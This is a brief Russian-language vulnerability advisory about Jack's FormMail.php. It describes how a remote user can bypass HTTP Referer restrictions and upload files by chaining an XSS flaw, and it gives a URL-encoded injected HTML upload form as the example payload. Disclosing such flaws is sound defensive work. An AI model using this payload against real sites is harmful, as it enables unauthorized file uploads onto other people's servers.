Программа: Jack's FormMail.php 

Уязвимость обнаружена в Jack's FormMail.php сценарии. Удаленный пользователь может загружать файлы на целевую систему.
Удаленный пользователь может обойти ограничения доступа по HTTP Referer, чтобы загрузить файл на целевую систему. Для этого, удаленный пользователь должен эксплуатировать связанную уязвимость (типа XSS): 

http://[target]/foo.php?css=<form%20method=post%20 enctype= multipart/form-data%20action=
formmail.php>
<input%20type=hidden%20name=MAX_FILE_SIZE>
<input%20type=file%20name=file%20>
<input%20type=hidden% 20name=recipient %20%20 value= %20foo@foo.com%20>
<input%20type=submit>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии